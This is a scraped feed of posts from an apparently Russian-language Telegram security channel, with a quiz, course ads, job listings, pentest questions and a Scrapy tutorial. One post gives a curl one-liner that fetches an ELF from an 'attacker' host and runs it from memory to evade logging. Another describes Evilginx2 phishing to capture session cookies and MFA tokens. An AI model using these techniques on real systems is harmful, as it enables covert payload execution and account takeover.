Какой HTTP-код придумали шутки ради, а потом он стал мемом ❓
Anonymous Quiz
25%
451
15%
499
22%
418
38%
999
💯5😁1
Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.
Чем полезен:
— Обход классических 2FA/SMS/MFA
— Реалистичные фишинговые страницы (копируются вживую)
— Поддержка кастомных фишинговых шаблонов
— Логи сессий с захваченными cookies и токенами
Пример запуска:
evilginx -p ./phishlets/microsoft.yaml
После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👏2
Мессенджер Max активно продвигают как «новинку», но под капотом он оказался куда более знакомым.
В карточках — что внутри Max, на чём он работает и как обстоят дела с безопасностью
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚8❤3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁9🌚2
Не базовые ls и cd, а готовые мини-скрипты: перенос директорий, умное переименование файлов, калькулятор, расширенный пинг и даже предсказания с cowsay.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5😁4🔥1
Если хотите выйти за рамки базового пентеста и реально прокачать навыки, эти темы и ресурсы точно стоит изучить:
Обширный вики-справочник по пентесту и CTF: от эксплуатации уязвимостей до обхода защит. Отлично структурирован и регулярно обновляется сообществом.
Каталог Unix-бинарников, которые можно использовать для обхода локальных ограничений и эскалации привилегий. Полезен при работе с ограниченными шеллами.
Коллекция полезных пэйлоадов и техник обхода для тестирования веб-приложений. Подходит для пентестеров и участников CTF.
Ресурс, предлагающий материалы по анализу вредоносного ПО, включая лабораторные задания и руководства.
Образовательная платформа, предлагающая курсы по низкоуровневой безопасности, реверс-инжинирингу и эксплуатации уязвимостей.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6😢2
Вы тестируете веб-приложение, которое передаёт данные чата через WebSocket. При анализе трафика вы замечаете:
— Подключение идёт по ws:// вместо wss://
— Сообщения передаются в открытом виде (JSON без шифрования)
— В сообщениях содержатся идентификаторы пользователей и текст переписки
Какая уязвимость возникает в такой конфигурации
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔4
This media is not supported in your browser
VIEW IN TELEGRAM
👾3
7 октября стартует второй поток курса «AI-агенты для DS-специалистов».
За 5 недель вы научитесь собирать агентов, которые уже сейчас будут помогать бизнесу.
В кружке выше Максим Шаланкин, наш преподаватель, рассказывает подробнее — включай, чтобы не пропустить.
Please open Telegram to view this post
VIEW IN TELEGRAM
Специалист по информационной безопасности — 230 000 ₽, офис (Москва)
Инженер ИБ сервисов — удаленно/гибрид (Москва)
Pentester — от 380 000 ₽, удаленно (Москва)
Information Security Specialist (DLP) — от 120 000 ₽, офис (Москва)
Специалист ИБ — от 200 000 до 300 000 ₽, офис (Моска)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4🔥2
Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:
curl https://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'
Как работает:
— curl тянет бинарь по HTTP
— /dev/fd/0 — спецфайл, указывающий на поток stdin
— chmod +x делает поток исполняемым
— /dev/fd/0 сразу запускается как исполняемый ELF
Полезно для:
— Заменить curl на wget -qO-, socat, nc, httpie
— Альтернатива: /proc/self/fd/0
— Можно обфусцировать URL, использовать TLS и подмену юзер-агента
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍2
This media is not supported in your browser
VIEW IN TELEGRAM
❗ Так, владелец макбука. Хватит позировать в кофейне.
Настоящее портфолио — это не стикеры на крышке, а проект с чистым кодом, README и рабочей демкой.
Не знаешь, как такой собрать? Научим. Наш курс «ML для старта в Data Science» — это пошаговый гайд к проекту, за который не стыдно.
ОСТАЛАСЬ НЕДЕЛЯ, чтобы забрать его по старой цене в 44.000 ₽. С 1 сентября — всё.
🎁 И да, при покупке курса ML до 1 сентября — курс по Python получаешь бесплатно.
👉 Апгрейд от «вайба» до «оффера» тут
Настоящее портфолио — это не стикеры на крышке, а проект с чистым кодом, README и рабочей демкой.
Не знаешь, как такой собрать? Научим. Наш курс «ML для старта в Data Science» — это пошаговый гайд к проекту, за который не стыдно.
ОСТАЛАСЬ НЕДЕЛЯ, чтобы забрать его по старой цене в 44.000 ₽. С 1 сентября — всё.
🎁 И да, при покупке курса ML до 1 сентября — курс по Python получаешь бесплатно.
👉 Апгрейд от «вайба» до «оффера» тут
🥱1
Группировка маскирует свои серверы под IT-сервисы, комбинирует собственные и покупные инструменты, а внутри неё назревает раскол — разные фракции строят отдельную инфраструктуру.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1👾1
🔧 Автоматизация сбора данных с веб-сайтов через Scrapy
Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:
➖ Сбора данных
➖ Поиска уязвимостей и метаданных
➖ OSINT и аналитики
Как работает:
1. Для начала нужно установить Scrapy. Это можно сделать через pip:
2. Создайте новый проект с помощью команды:
3. Создайте новый файл паука в каталоге spiders/ вашего проекта:
4. Пример паука:
5. После настройки паука вы можете запустить его с помощью команды:
Советы по использованию:
— Настройте
— Используйте обработку ошибок
— Применяйте разные User-Agent / Proxy
🐸 Библиотека хакера
#буст
Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:
Как работает:
1. Для начала нужно установить Scrapy. Это можно сделать через pip:
pip install scrapy
2. Создайте новый проект с помощью команды:
scrapy startproject myproject
3. Создайте новый файл паука в каталоге spiders/ вашего проекта:
scrapy genspider example_spider example.com
4. Пример паука:
import scrapy
class ExampleSpider(scrapy.Spider):
name = "example_spider"
start_urls = ['https://www.example.com']
def parse(self, response):
yield {
'title': response.xpath('//title/text()').get(),
'url': response.url,
}
5. После настройки паука вы можете запустить его с помощью команды:
scrapy crawl example_spider -o output.json
Советы по использованию:
— Настройте
DOWNLOAD_DELAY
— Используйте обработку ошибок
— Применяйте разные User-Agent / Proxy
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👏1👾1